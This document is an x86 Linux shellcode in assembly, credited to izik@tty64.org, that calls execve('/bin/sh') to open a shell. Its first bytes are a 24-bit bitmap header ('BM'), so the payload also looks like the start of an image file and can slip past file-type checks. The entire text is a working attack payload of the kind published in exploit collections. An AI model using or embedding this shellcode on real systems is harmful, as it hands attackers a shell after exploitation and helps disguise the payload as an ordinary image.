# # x86/linux - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 23 bytes # - izik@tty64.org # .section .text .global _start _start: # # Bitmap 24bit Header # .byte 0x42 .byte 0x4D .byte 0x36 .byte 0x91 # # execve("/bin/sh", ["/bin/sh", NULL]); # push $0xb popl %eax cdq push %edx push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %edx push %ebx mov %esp, %ecx int $0x80